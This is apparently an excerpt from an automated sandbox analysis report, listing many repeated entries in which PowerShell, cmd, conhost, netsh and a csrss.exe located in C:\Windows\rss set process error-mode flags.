        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
